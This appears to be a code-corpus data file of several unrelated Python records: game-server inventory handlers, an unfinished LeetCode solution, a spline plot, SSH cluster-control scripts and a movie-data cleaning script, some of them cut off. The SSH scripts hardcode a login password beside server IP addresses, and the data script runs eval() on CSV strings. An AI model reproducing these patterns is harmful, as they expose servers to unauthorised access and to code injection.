obj.map_obj.drop_item(tid = item[KEY_TID], x= obj.x, y = obj.y, owner_id = obj.gid, item = item, is_protected = 0)\n obj.empty_beibao_item(idx)\n@route('E06',require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_item_in_bag(obj,data):\n if not obj.valid_use_item():\n obj.tell_object('E06',CANNT_USE_ITEM)\n return\n from_idx,to_idx = int(data.from_pos) -1, int(data.to_pos - 1)\n beibao_len = len(obj.beibao)\n if from_idx < 0 or from_idx >= beibao_len or not obj.beibao[from_idx]:\n obj.tell_object('E06',ITEM_NOT_EXIST)\n return\n if to_idx < 0 or to_idx >= beibao_len:\n return\n# if obj.trading:\n# obj.tell_object('E06',TRADE_LOCKED)\n# return\n from_item = obj.beibao[from_idx]\n to_item = obj.beibao[to_idx]\n if from_item and to_item and is_prop(from_item[KEY_TID]) and from_item[KEY_TID] == to_item[KEY_TID] and from_item[KEY_BIND] == to_item[KEY_BIND]:\n from_amount, to_amount = from_item[KEY_AMOUNT], to_item[KEY_AMOUNT]\n max_stack = query_max_stack(from_item[KEY_TID])\n if from_amount + to_amount > max_stack:\n to_item[KEY_AMOUNT] = max_stack\n from_item[KEY_AMOUNT] -= max_stack - to_amount\n else:\n to_item[KEY_AMOUNT] += from_amount\n obj.empty_beibao_item(from_idx,broad = False)\n else:\n obj.beibao[from_idx],obj.beibao[to_idx] = obj.beibao[to_idx],obj.beibao[from_idx]\n obj.show_beibao_item(from_idx)\n obj.show_beibao_item(to_idx)\n obj.tell_object(\"E06\",1)\n\n@route('E07', require_para = item_pb2.ItemSplit)\n@cmd_exception_catch()\ndef item_split(obj,data):\n if not obj.valid_use_item():\n obj.tell_object('E07',CANNT_USE_ITEM)\n return\n idx = data.position - 1\n if idx < 0 or idx >= len(obj.beibao):\n obj.tell_object('E07',-2)\n return\n if not obj.beibao[idx]:\n obj.tell_object('E07',-2)\n return\n if obj.beibao[idx][KEY_AMOUNT] <= data.amount:\n obj.tell_object('E07',-3)\n return\n if obj.query_empty_count() <= 0:\n obj.tell_object('E07',-1)\n return\n old_item = obj.beibao[idx]\n new_item = copy(old_item)\n old_item[KEY_AMOUNT] -= data.amount\n new_item[KEY_AMOUNT] = data.amount\n obj.show_beibao_item(idx)\n 
obj.add_to_bag(new_item, can_combine = False)\n obj.tell_object('E07',1)\n\n@route('E08')\n@cmd_exception_catch()\ndef sort_bag(obj,data):\n ''' Sort and merge the bag '''\n if not obj.valid_use_item():\n obj.tell_object('E08',CANNT_USE_ITEM)\n return\n obj.combine_items()\n obj.beibao.sort(bag_cmper)\n obj.tell_object('E01', 1, get_store_pb2(obj.beibao))\n obj.tell_object('E08',1)\n\n@route('E09', require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_to_cangku(obj, data):\n ''' Drag an item from the bag into the warehouse '''\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n if obj.query_cangku_empty_count() <= 0:\n return\n from_idx, to_idx = data.from_pos - 1, data.to_pos - 1\n if from_idx >= len(obj.beibao) or to_idx >= len(obj.cangku):\n return\n if obj.cangku[to_idx] or not obj.beibao[from_idx]:\n return\n item = obj.beibao[from_idx]\n obj.beibao[from_idx] = 0\n obj.cangku[to_idx] = item\n obj.show_beibao_item(from_idx)\n obj.show_cangku_item(to_idx)\n obj.tell_object('E09', 1)\n\n@route('E10', require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_from_cangku(obj, data):\n ''' Drag an item from the warehouse into the bag '''\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n if obj.query_empty_count() <= 0:\n return\n from_idx, to_idx = data.from_pos - 1, data.to_pos - 1\n if from_idx >= len(obj.cangku) or to_idx >= len(obj.beibao):\n return\n if obj.beibao[to_idx] or not obj.cangku[from_idx]:\n return\n item = obj.cangku[from_idx]\n obj.cangku[from_idx] = 0\n obj.beibao[to_idx] = item\n obj.show_cangku_item(from_idx)\n obj.show_beibao_item(to_idx)\n obj.tell_object('E10', 1)\n\n@route('E11', require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_item_in_cangku(obj,data):\n if not obj.valid_use_item():\n obj.tell_object('E11',CANNT_USE_ITEM)\n return\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n from_idx,to_idx = data.from_pos -1, data.to_pos - 1\n if from_idx < 0 or from_idx >= len(obj.cangku) or not obj.cangku[from_idx]:\n obj.tell_object('E11',ITEM_NOT_EXIST)\n return\n from_item = obj.cangku[from_idx]\n to_item = obj.cangku[to_idx]\n if from_item and to_item and is_prop(from_item[KEY_TID]) and from_item[KEY_TID] == to_item[KEY_TID] and from_item[KEY_BIND] == to_item[KEY_BIND]:\n from_amount, to_amount = from_item[KEY_AMOUNT], to_item[KEY_AMOUNT]\n max_stack = query_max_stack(from_item[KEY_TID])\n if from_amount + to_amount > max_stack:\n to_item[KEY_AMOUNT] = max_stack\n from_item[KEY_AMOUNT] -= max_stack - to_amount\n else:\n to_item[KEY_AMOUNT] += from_amount\n obj.empty_cangku_item(from_idx,broad = False)\n else:\n obj.cangku[from_idx],obj.cangku[to_idx] = obj.cangku[to_idx],obj.cangku[from_idx]\n obj.show_cangku_item(from_idx)\n obj.show_cangku_item(to_idx)\n obj.tell_object(\"E11\",1)\n\n@route('E12', require_para = item_pb2.ItemSplit)\n@cmd_exception_catch()\ndef item_split_in_cangku(obj,data):\n if not obj.valid_use_item():\n obj.tell_object('E12',CANNT_USE_ITEM)\n return\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n idx = data.position - 1\n if idx < 0 or idx >= len(obj.cangku):\n obj.tell_object('E12',-2)\n return\n if not obj.cangku[idx]:\n obj.tell_object('E12',-2)\n return\n if obj.cangku[idx][KEY_AMOUNT] <= data.amount:\n obj.tell_object('E12',-3)\n return\n if obj.query_cangku_empty_count() <= 0:\n obj.tell_object('E12',-1)\n return\n old_item = obj.cangku[idx]\n 
new_item = copy(old_item)\n old_item[KEY_AMOUNT] -= data.amount\n new_item[KEY_AMOUNT] = data.amount\n obj.show_cangku_item(idx)\n obj.add_to_cangku(new_item, can_combine = False)\n obj.tell_object('E12',1)\n\n@route('E13')\n@cmd_exception_catch()\ndef sort_cangku(obj,data):\n ''' Sort and combine items in the warehouse. '''\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n if not obj.valid_use_item():\n obj.tell_object('E13',CANNT_USE_ITEM)\n return\n obj.combine_cangku_items()\n obj.cangku.sort(bag_cmper)\n obj.tell_object('E01', 2, get_store_pb2(obj.cangku))\n obj.tell_object('E13',1)\n\n@route('E67',require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_lug_to_bar(obj,data):\n '''Drag a luggage pack from the bag onto the luggage bar.\n arg: bag index | luggage bar index'''\n if not obj.valid_use_item():\n obj.tell_object('E67',CANNT_USE_ITEM)\n return\n bag_idx, lug_idx = int(data.from_pos) - 1, int(data.to_pos) - 1\n if bag_idx < 0 or bag_idx >= len(obj.beibao) or not obj.beibao[bag_idx]:\n obj.tell_object('E67',ITEM_NOT_EXIST)\n return\n# if obj.trading:\n# obj.tell_object('E67',TRADE_LOCKED)\n# return\n if prop.query_typ(obj.beibao[bag_idx][KEY_TID]) != TYP_LUG:\n obj.tell_object('E67',NOT_LUG)\n return\n if lug_idx < 0 or lug_idx >= LUG_BAR_SZ:\n obj.tell_object('E67',LUG_POS_OVERFLOW)\n return\n if obj.lug_bar[lug_idx]:\n result = prop.replace_lug(obj,bag_idx,obj.beibao[bag_idx],lug_idx)\n if result == True:\n obj.tell_object('E67',1)\n else:\n obj.tell_object('E67',result)\n else:\n for i,item in enumerate(obj.lug_bar):\n if not item:\n if i != lug_idx:\n logging.warning(\"use lug: using earlier empty lug position %s instead of client position %s\",i,lug_idx)\n prop.use_lug(obj,bag_idx,obj.beibao[bag_idx],i)\n break\n\n@route('E68',require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef unapply_lug(obj,data):\n '''Drag a luggage pack from the luggage bar back into the bag.'''\n if not obj.valid_use_item():\n obj.tell_object('E68',CANNT_USE_ITEM)\n return\n# if obj.trading:\n# obj.tell_object('E68',TRADE_LOCKED)\n# return\n bag_idx, lug_idx = int(data.to_pos) - 1, int(data.from_pos) - 1\n if lug_idx < 0 or lug_idx >= len(obj.lug_bar) or not obj.lug_bar[lug_idx]:\n obj.tell_object('E68',ITEM_NOT_EXIST)\n return\n if bag_idx < 0 or bag_idx >= len(obj.beibao) or obj.beibao[bag_idx]:\n obj.tell_object('E68',ITEM_NOT_EXIST)\n return\n start_idx = DEF_BEIBAO_SZ\n\n for i in range(lug_idx):\n start_idx += prop.query_typ_data(obj.lug_bar[i][KEY_TID])[1]\n lug_size = prop.query_typ_data(obj.lug_bar[lug_idx][KEY_TID])[1]\n end_idx = start_idx + lug_size\n if bag_idx >= start_idx and bag_idx < end_idx:\n obj.tell_object('E68',CANNT_DRAG_TO)\n return\n seg_used = obj.query_used_count(start_idx,end_idx)\n if obj.query_empty_count(lock_seg = (start_idx,end_idx)) < seg_used + 1:\n obj.tell_object('E68',BAG_FULL)\n return\n for sub_idx,item in enumerate(obj.beibao[start_idx : end_idx]):\n if not item:\n continue\n obj.add_to_bag(item,lock_seg = (start_idx,end_idx))\n obj.empty_beibao_item(start_idx + sub_idx,broad = False)\n obj.add_to_bag(obj.lug_bar[lug_idx],lock_seg = (start_idx,end_idx))\n obj.empty_lug_item(lug_idx)\n obj.reset_beibao_seg(start_idx,end_idx,0)\n obj.tell_object('E68',1)\n\n@route('E69',require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_eqp_to_bar(obj,data):\n '''Drag equipment from the bag onto the equipment bar.'''\n if not obj.valid_use_item():\n obj.tell_object('E69',CANNT_USE_ITEM)\n return\n bag_idx, eqp_pos = int(data.from_pos) - 1, int(data.to_pos)\n if bag_idx < 0 or bag_idx >= len(obj.beibao) or not obj.beibao[bag_idx]:\n 
obj.tell_object('E69',ITEM_NOT_EXIST)\n return\n# if obj.trading:\n# obj.tell_object('E69',TRADE_LOCKED)\n# return\n if data.taskid:\n tid = obj.beibao[bag_idx][KEY_TID]\n result = apply_equip(obj,bag_idx,obj.beibao[bag_idx],eqp_pos)\n if isinstance(result, int) and result < 0:\n obj.tell_object('E69',result)\n else:\n if data.taskid:\n obj.task_use_item(tid)\n obj.tell_object('E69',1)\n\n@route('E66',require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef unapply_equip(obj,data):\n '''Drag equipment from the equipment bar back into the bag.'''\n if not obj.valid_use_item():\n obj.tell_object('E66',-18)\n return\n eqp_pos = int(data.from_pos)\n bag_idx, eqp_idx = int(data.to_pos) - 1, int(data.from_pos) - 1\n if eqp_idx < 0 or eqp_idx >= len(obj.eqp_bar) or not obj.eqp_bar[eqp_idx]:\n obj.tell_object('E66',ITEM_NOT_EXIST)\n return\n if bag_idx < 0 or bag_idx >= len(obj.beibao) or obj.beibao[bag_idx]:\n obj.tell_object('E66',BAG_IDX_INVALID)\n return\n has_eqp_buff = False\n eqp = obj.eqp_bar[eqp_idx]\n obj.beibao[bag_idx] = eqp\n obj.empty_eqp_item(eqp_idx)\n obj.show_beibao_item(bag_idx)\n if eqp_idx + 1 in attack_pos or eqp_idx + 1 in def_pos:\n if KEY_FULING in eqp:\n has_eqp_buff = True\n if eqp_idx != MOUNT_EQP_IDX:\n if eqp[KEY_NAIJIU]:\n calc_eqp_attr(eqp, obj.fight[\"l1\"], obj.fight[\"l2\"], obj.fight[\"l2p\"], unapply = True)\n equip.replace_equip_san(obj, eqp_idx, eqp, unapply = True)\n obj.merge_fight()\n else:\n if equip.replace_equip_san(obj, eqp_idx, eqp, unapply = True):\n obj.merge_fight()\n elif obj.mounting or obj.multi_mounting:\n obj.unmount()\n if eqp_idx == 2 or eqp_idx == 12:\n res = role_pb2.RoleChangeDress()\n res.id = obj.gid\n res.type = eqp_idx + 1\n obj.map_obj.tell_room(\"B19\",1,res)\n if has_eqp_buff:\n cal_eqp_buff(obj)\n obj.tell_object('E66',1)\n\n@route(\"E30\")\n@cmd_exception_catch()\ndef extend_cangku(obj, data):\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n page = len(obj.cangku) / CANGKU_SZ\n if page >= 12:\n obj.tell_object(\"E30\", -1)\n return\n if page <= 2:\n cost_money = 50000 if page == 1 else 10000\n if not obj.has_money(cost_money):\n obj.tell_object(\"E30\", -2)\n return\n obj.pay_money(cost_money)\n else:\n if not obj.has_item(CANGKU_PROP):\n obj.tell_object(\"E30\", -2)\n return\n obj.reduce_items({CANGKU_PROP : 1})\n obj.cangku += [0] * CANGKU_SZ\n res = item_pb2.StoreSize()\n res.size = len(obj.cangku)\n obj.tell_object(\"E30\", 1, res)\n\n@route(\"E28\", require_para = item_pb2.Money)\n@cmd_exception_catch()\ndef save_money_to_cangku(obj, data):\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n val = data.money\n if not obj.has_money(val):\n return\n obj.add_ck_money(val)\n obj.pay_money(val)\n res = item_pb2.Money()\n res.money = obj.ck_money\n obj.tell_object(\"E28\", 1, res)\n\n@route(\"E29\", require_para = item_pb2.Money)\n@cmd_exception_catch()\ndef draw_money_from_cangku(obj, data):\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n val = data.money\n if not obj.has_ck_money(val):\n return\n obj.reduce_ck_money(val)\n obj.gain_money(val)\n res = item_pb2.Money()\n res.money = obj.ck_money\n obj.tell_object(\"E29\", 1, res)\n\n\n","sub_path":"yuanneng/item_store.py","file_name":"item_store.py","file_ext":"py","file_size_in_byte":37465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} 
+{"seq_id":"618448240","text":"# Given a string that contains only digits 0-9 and a target value, return\n# all possibilities to add binary operators (not unary) +, -, or * between\n# the digits so they evaluate to the target value.\n\n# Examples: \n# \"123\", 6 -> [\"1+2+3\", \"1*2*3\"] \n# \"232\", 8 -> [\"2*3+2\", \"2+3*2\"]\n# \"105\", 5 -> [\"1*0+5\",\"10-5\"]\n# \"00\", 0 -> [\"0+0\", \"0-0\", \"0*0\"]\n# \"3456237490\", 9191 -> []\n\n# Credits: Special thanks to @davidtan1890 for adding this problem and\n# creating all test cases.\n\nfrom itertools import chain\n\nOPS = [\n \"\",\n \"+\",\n \"-\",\n \"*\",\n]\n\ndef nextOp():\n yield('+')\n yield('-')\n yield('*')\n\nclass Solution(object):\n def addOperators(self, num, target):\n \"\"\"\n :type num: str\n :type target: int\n :rtype: List[str]\n \"\"\"\n if len(num) == 0:\n return []\n\n results = []\n numlist = [int(c) for c in num]\n stack = [(numlist[0], next(nextOp()))]\n while True:\n curtot, opgen = stack[-1]\n if len(stack) == len(numlist):\n if curtot == target:\n restr = ''.join(chain(elem for elem in stack))\n","sub_path":"ExpressionAddOperators.py","file_name":"ExpressionAddOperators.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"451923517","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\n#%matplotlib inline\nimport random\n\n# set seed to reproducible\nrandom.seed(1)\ndata_size = 51\nmax_value_range = 132651\nx = np.array([random.random()*max_value_range for p in range(0,data_size)])\ny = np.array([random.random()*max_value_range for p in range(0,data_size)])\nz = 2*x*x*x + np.sqrt(y)*y + random.random()\n#fig = plt.figure(figsize=(10,6))\n#ax = axes3d.Axes3D(fig)\n#ax.scatter3D(x,y,z, c='r')\n\nn = 132651\nn = 13265\nx_grid = np.linspace(0, n, 1000*len(x))\ny_grid = np.linspace(0, n, 1000*len(y))\nB1, B2 = np.meshgrid(x_grid, y_grid, indexing='xy')\nZ = np.zeros((x.size, z.size))\n\nimport scipy as sp\nimport scipy.interpolate\nspline = sp.interpolate.Rbf(x,y,z,function='thin_plate',smooth=5, episilon=5)\n\nZ = spline(B1,B2)\nfig = plt.figure(figsize=(10,6))\nax = axes3d.Axes3D(fig)\nax.plot_wireframe(B1, B2, Z)\nax.plot_surface(B1, B2, Z,alpha=0.2)\nax.scatter3D(x,y,z, c='r')\nplt.show()\n","sub_path":"Miscellaneous/3d_plots/spline.py","file_name":"spline.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"364369458","text":"import ssh\nimport time\nimport re\nimport os\nfrom shutil import copyfile\n\nimport nonsyn\nimport syn\n\n#the name of the screen will be globalc/localc on each server.\n#the screen log file would be written to /tmp/globalc.log, /tmp/localc.log\n#the screen configuration file would be /tmp/globalc.screenrc, /tmp/localc/screenrc\n\ndef launch_controllers(global_addr, local_addr_list, interval_length, enableReactive, version, scale_down_interval):\n name = 'net'\n pwd = 'netexplo'\n\n global_client = ssh.reliable_client_creation(global_addr, name, pwd)\n local_client_list = []\n for i in range(0, len(local_addr_list)):\n local_addr = local_addr_list[i]\n local_client = ssh.reliable_client_creation(local_addr, name, pwd)\n local_client_list.append(local_client)\n \n ssh.exec_cmd(global_client, \"rm -f /home/net/globalc/globalc.cfg\")\n ssh.exec_cmd(global_client, 'echo \"'+version+'\" >> /home/net/globalc/globalc.cfg')\n 
ssh.exec_cmd(global_client, 'echo \"'+str(len(local_addr_list))+'\" >> /home/net/globalc/globalc.cfg')\n ssh.exec_cmd(global_client, 'echo \"'+interval_length+'\" >> /home/net/globalc/globalc.cfg')\n\n ssh.create_screen(global_client, '/tmp/globalc.screenrc', '/tmp/globalc.log', 'globalc')\n ssh.exec_cmd_in_screen(global_client, 'globalc', 'java -jar /home/net/globalc/jar/globalc.jar')\n print (\"Creating global controller on server:\"+global_addr)\n time.sleep(1)\n\n for i in range(0, len(local_client_list)):\n local_addr = local_addr_list[i]\n local_client = local_client_list[i]\n local_addr_split = local_addr.split('.')\n index = int(local_addr_split[3])-145\n ssh.exec_cmd(local_client, \"rm -f /home/net/floodlight/localc.cfg\")\n ssh.exec_cmd(local_client, 'echo \"'+enableReactive+'\" >> /home/net/floodlight/localc.cfg')\n ssh.exec_cmd(local_client, 'echo \"'+str(index)+'\" >> /home/net/floodlight/localc.cfg')\n ssh.exec_cmd(local_client, 'echo \"'+str(scale_down_interval)+'\" >> /home/net/floodlight/localc.cfg')\n\n ssh.create_screen(local_client, '/tmp/localc.screenrc', '/tmp/localc.log', 'localc')\n ssh.exec_cmd_in_screen(local_client, 'localc', 'cd ~/floodlight/')\n ssh.exec_cmd_in_screen(local_client, 'localc', 'sudo ./run')\n print (\"Creating local controller on server:\"+local_addr)\n time.sleep(1)\n\n global_client.close()\n for local_client in local_client_list:\n local_client.close()\n\ndef destroy_vm(client, addr):\n successful = False\n while successful == False:\n output_list, exit_code, r = ssh.exec_cmd(client, 'virsh list --all')\n successful = True\n for each in output_list:\n if 'CONTROL' in each or 'DATA' in each:\n successful = False\n split_list = re.findall(r'\\S+', each)\n vm_num = split_list[0]\n \n print ('Executing virsh destroy '+vm_num)\n ssh.exec_cmd(client, 'virsh destroy '+vm_num)\n\n print ('All vms have been destroyed on server:'+addr)\n\ndef clear_environment(client, addr):\n ssh.exec_cmd(client, 'sudo /home/net/floodlight/clean-env.sh')\n print ('Environment has been cleared on server:'+addr)\n\ndef shutdown_controllers(global_addr, local_addr_list):\n name='net'\n pwd = 'netexplo'\n\n global_client = ssh.reliable_client_creation(global_addr, name, pwd)\n local_client_list = []\n for i in range(0, len(local_addr_list)):\n local_addr = local_addr_list[i]\n local_client = ssh.reliable_client_creation(local_addr, name, pwd)\n local_client_list.append(local_client)\n\n print (\"Start shutting down controller on each server.\")\n ssh.kill_screen(global_client, 'globalc')\n print ('Screen globalc has been shutdown on server:'+global_addr)\n for i in range(0,len(local_addr_list)):\n ssh.kill_screen(local_client_list[i], 'localc')\n print ('Screen localc has been shutdown on server:'+local_addr_list[i])\n\n print (\"Start destroying vms on each server.\")\n for i in range(0,len(local_addr_list)):\n destroy_vm(local_client_list[i], local_addr_list[i])\n\n print (\"Start clearing runtime environment on each server.\")\n for i in range(0,len(local_addr_list)):\n clear_environment(local_client_list[i], local_addr_list[i])\n\n global_client.close()\n for local_client in local_client_list:\n local_client.close()\n\n\ndef is_init_finish():\n copyfile('/tmp/globalc.log', '/tmp/inspect')\n inspect = open('/tmp/inspect')\n inspect_list = inspect.readlines()\n\n init_finish = False\n\n for line in inspect_list:\n if 'current scaling interval finish,interval:0' in line:\n init_finish = True\n\n inspect.close()\n return init_finish\n\ndef check_all_zero(l):\n all_zero = 
True\n \n for e in l:\n if e != 0:\n all_zero = False\n break\n\n return all_zero\n\ndef check_all_one(l):\n all_one = True\n \n for e in l:\n if e != 1:\n all_one = False\n break\n\n return all_one\n\n\ndef check_finish(dc_num):\n copyfile('/tmp/globalc.log', '/tmp/inspect')\n inspect = open('/tmp/inspect')\n inspect_list = inspect.readlines()\n\n init_finish = False\n last_new_provision_linenum = 0\n last_provision_linenum = 0\n\n\n for i in range(0, len(inspect_list)):\n reverse_i = len(inspect_list)-1-i\n reverse_line = inspect_list[reverse_i]\n if 'Dataplane new provision::' in reverse_line:\n last_new_provision_linenum = reverse_i\n break\n\n all_zero = True\n for i in range(last_new_provision_linenum+2, last_new_provision_linenum+2+dc_num):\n line = inspect_list[i]\n l = [int(s) for s in re.findall(r'\\d+', line)]\n if (check_all_zero(l) == False):\n all_zero = False\n break\n\n for i in range(0, len(inspect_list)):\n reverse_i = len(inspect_list)-1-i\n reverse_line = inspect_list[reverse_i]\n if 'Dataplane provision:' in reverse_line:\n last_provision_linenum = reverse_i\n break\n\n all_one = True\n for i in range(last_provision_linenum+2, last_provision_linenum+2+dc_num):\n line = inspect_list[i]\n l = [int(s) for s in re.findall(r'\\d+', line)]\n if (check_all_one(l) == False):\n all_one = False\n break\n\n inspect.close()\n return all_zero and all_one\n\ndef check_scaling_interval():\n inspect = open('/tmp/globalc.log')\n inspect_list = inspect.readlines()\n\n init_finish = False\n linenum = 0\n\n for i in range(0, len(inspect_list)):\n reverse_i = len(inspect_list)-1-i\n reverse_line = inspect_list[reverse_i]\n if 'current scaling interval finish,interval:' in reverse_line:\n linenum = reverse_i\n break\n\n line = inspect_list[linenum]\n line_split = line.split(\":\")\n scaling_interval = str(line_split[3])\n\n inspect.close()\n return scaling_interval\n\ndef grep_check(client, file_name, grep_word):\n output_list, exit_code, return_val = ssh.exec_cmd(client, 'grep \"'+grep_word+'\" '+file_name)\n if len(output_list)>0 and exit_code == 0:\n return True\n else:\n return False\n\ndef check_connection(global_client, local_client_list):\n name = \"net\"\n pwd = \"netexplo\"\n\n error_flag = False\n\n if grep_check(global_client, \"/tmp/globalc.log\", \"ERROR\") or grep_check(global_client, \"/tmp/globalc.log\", \"Exception\"):\n error_flag = True\n\n for local_client in local_client_list:\n if grep_check(local_client, \"/tmp/localc.log\", \"Disconnected connection\"):\n error_flag = True\n\n return error_flag\n\ndef check_exp_good(global_addr, local_addr_list):\n name = \"net\"\n pwd = \"netexplo\"\n\n global_client = ssh.reliable_client_creation(global_addr, name, pwd)\n local_client_list = []\n for i in range(0, len(local_addr_list)):\n local_addr = local_addr_list[i]\n local_client = ssh.reliable_client_creation(local_addr, name, pwd)\n local_client_list.append(local_client)\n\n error_flag = False\n\n if grep_check(global_client, \"/tmp/globalc.log\", \"ERROR\") or grep_check(global_client, \"/tmp/globalc.log\", \"Exception\"):\n error_flag = True\n\n for local_client in local_client_list:\n if grep_check(local_client, \"/tmp/localc.log\", \"ERROR\") or grep_check(local_client, \"/tmp/localc.log\", \"Exception\") or grep_check(local_client, \"/tmp/localc.log\", \"Disconnected connection\"):\n error_flag = True\n\n global_client.close()\n for local_client in local_client_list:\n local_client.close()\n return error_flag\n\ndef compute_num(global_client, local_client_list):\n l,e,r 
= ssh.exec_cmd(global_client, 'grep -o \"global-call-report\" /tmp/globalt.log | wc -l')\n call_num = int(l[0])*2\n\n counter = 0\n for local_client in local_client_list:\n l,e,r = ssh.exec_cmd(local_client, 'grep -o \"call report\" /tmp/localt.log | wc -l')\n counter += int(l[0])\n\n if 0.9*float(call_num)>float(counter):\n return True\n else:\n return False\n\ndef test_compute_num():\n global_addr = '202.45.128.147'\n local_addr_list = ['202.45.128.148', '202.45.128.149', '202.45.128.152', '202.45.128.151']\n name = \"net\"\n pwd = \"netexplo\"\n\n global_client = ssh.reliable_client_creation(global_addr, name, pwd)\n local_client_list = []\n for i in range(0, len(local_addr_list)):\n local_addr = local_addr_list[i]\n local_client = ssh.reliable_client_creation(local_addr, name, pwd)\n local_client_list.append(local_client)\n\n return compute_num(global_client, local_client_list)","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":9643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"48779627","text":"import numpy as np\nimport pandas as pd\nimport click\nimport os\nfrom pandas.api.types import is_numeric_dtype\n\ndef _convert_str_to_dataframe(string, movie_id, prefix, id_name, value_name):\n \"\"\"\n Convert a string representation of an array of json objects into a data frame\n\n Args:\n string: string representation of an array of json objects\n movie_id: movie_id that is at the same row as the string\n prefix: prefix added to the column names.\n Returns:\n a dataframe representation of the json array\n \"\"\"\n if pd.notnull(string):\n lst = eval(string)\n # if the string representation is not a list\n # treat it as an empty list\n if type(lst) != list:\n lst = [{id_name: np.nan, value_name: np.nan}]\n else:\n lst = [{id_name: np.nan, value_name: np.nan}]\n frame = pd.DataFrame(lst)\n frame.columns = [prefix + c for c in frame.columns]\n frame['movie_id'] = movie_id\n return frame\n\n\ndef _reorganize_many_to_many_column(data, col_name, movie_id_col, prefix, id_name, value_name):\n \"\"\"\n helper function to create a entity data set and a relationship data set based on\n the column that contains array of json object\n\n Args:\n data: input data that contains the column of json arrary\n col_name: column that contains a json array\n movie_id_col: column that specifies the column id, and the id will be used in the relationship dataset\n prefix: prefix added to the column names of the entity data set and and the\n column names of the relationship data set(prefix will not be added to movie_id column)\n id_name: name of the id column in the json object\n value_name: name of the value column in the json object\n Returns:\n an entity data set and a relationship dataset\n \"\"\"\n data_to_stack = []\n for idx, row in data.iterrows():\n json_array_str = row[col_name]\n frame = _convert_str_to_dataframe(json_array_str, row[movie_id_col], prefix, id_name, value_name)\n data_to_stack.append(frame)\n\n concat_data = pd.concat(data_to_stack, axis=0)\n if is_numeric_dtype(concat_data[prefix + id_name]):\n concat_data[prefix + id_name] = concat_data[prefix + id_name].astype('Int64')\n concat_data_summary = concat_data.groupby([prefix + id_name, prefix + value_name]).size().reset_index()\n concat_data_summary = concat_data_summary[[prefix + id_name, prefix + value_name]]\n relationship_data = concat_data[['movie_id', prefix + id_name]]\n return concat_data_summary, relationship_data\n\ndef 
_reorganize_many_to_one_column(data, col_name, prefix):\n \"\"\"\n helper function to transform each column of json objects into a data frame\n Args:\n data: data that contains the column of json object\n col_name: name of the column that stores the json objects\n prefix: prefix added to the column names of the output data\n Returns:\n a dataframe representation of the json column\n \"\"\"\n lst_of_obs = []\n for idx, row in data.iterrows():\n lst_of_obs.append(eval(row[col_name]) if pd.notnull(row[col_name]) else {})\n lst_of_obs = [e if type(e) == dict else {} for e in lst_of_obs]\n data = pd.DataFrame(lst_of_obs)\n data.columns = [prefix + name for name in data.columns]\n return data\n\ndef reorganize_meta_data(meta_data):\n \"\"\"\n Function that removes columns of json objects or columns of json arrays, and transforms those columns into independent dataframes\n Args:\n meta_data: dataframe\n \"\"\"\n output_dict = dict()\n # columns that store json arrays\n for col in ['genres', 'production_companies', 'production_countries', 'spoken_languages']:\n if col == 'genres' or col == 'production_companies':\n id_name = 'id'\n elif col == 'production_countries':\n id_name = 'iso_3166_1'\n else:\n id_name = 'iso_639_1'\n value_name = 'name'\n summary_data, relationship = _reorganize_many_to_many_column(meta_data, col, 'id',\n col + '_', id_name, value_name)\n output_dict[col + '_data'] = summary_data\n output_dict['movie_' + col + '_relation'] = relationship\n # deal with belongs_to_collection column, which stores json objects instead of json arrays\n data = _reorganize_many_to_one_column(meta_data, 'belongs_to_collection', 'collection_')\n # remove columns of json arrays and json objects\n clean_meta_data = pd.concat([meta_data, data], axis = 1).drop(columns = ['genres', 'production_companies', \\\n 'production_countries', 'spoken_languages',\\\n 'belongs_to_collection'] )\n output_dict['clean_meta_data'] = clean_meta_data\n return output_dict\n\n\n\n@click.command()\n@click.option('--raw_data_path', required=True)\n@click.option('--output_path', required=True)\ndef main(raw_data_path, output_path):\n \"\"\"\n main function that takes the original raw movie data set, and then conducts data cleaning,\n and stores the clean data into the output_path\n Args:\n raw_data_path: path string to the raw movie data set\n output_path: path string to store the clean data\n \"\"\"\n raw_data_path = r'{}'.format(raw_data_path)\n all_raw_data_files = os.listdir(raw_data_path)\n data_names = [name.split('.')[0] for name in all_raw_data_files]\n clean_data_dict = dict()\n for i in range(len(all_raw_data_files)):\n read_file = r'{}\\{}'.format(raw_data_path, all_raw_data_files[i])\n raw_data = pd.read_csv(read_file)\n if data_names[i] == 'movies_metadata':\n output_data_sets = reorganize_meta_data(raw_data)\n for key, value in output_data_sets.items():\n clean_data_dict[key] = value\n elif data_names[i] == 'keyword':\n summary_data, relationship = _reorganize_many_to_many_column(raw_data, 'keywords', 'id',\n 